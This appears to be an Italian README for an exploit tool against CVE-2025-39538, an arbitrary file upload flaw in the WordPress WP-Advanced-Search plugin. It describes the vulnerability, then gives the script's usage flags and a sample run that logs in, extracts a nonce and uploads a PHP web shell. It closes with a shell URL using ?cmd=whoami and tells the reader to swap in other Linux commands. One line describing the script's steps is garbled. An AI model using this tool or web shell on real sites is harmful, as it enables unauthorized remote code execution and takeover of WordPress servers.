
WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilità di caricamento file arbitrario
CVE-2025-39538
Pubblicato: 2025-04-16
Tipo di vulnerabilità: Caricamento Arbitrario di File (Caricamento senza restrizioni di file con tipo pericoloso)
Plugin interessato: WP-Advanced-Search di Mathieu Chartier
Versioni interessate: Tutte le versioni fino alla 3.3.9.3 inclusa
Questa vulnerabilità consente a un attaccante autenticato di caricare un file PHP malevolo (ad esempio una web shell) sul server utilizzando la funzionalità di importazione fornita dal plugin. Il file caricato viene posizionato nella directory degli upload di WordPress e potrebbe portare all'esecuzione di codice remoto.
🧱 Percorso di upload:
wp-content/uploads/2025/04/
Questo script Python esegue le seguenti azioni:
wp_advanced_search_up_nonce dalla pagina di amministrazione import/export.usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
Dopo il caricamento, puoi accedere alla tua shell in questo modo:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
Sostituisci whoami con qualsiasi comando Linux che desideri eseguire, ad esempio:
id — mostra l'ID utente corrente.pwd — mostra la directory corrente.ls — elenca i file.Questo strumento è inteso esclusivamente per scopi di test di sicurezza educativi e autorizzati.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.
Di: Nxploited | Khaled Alenazi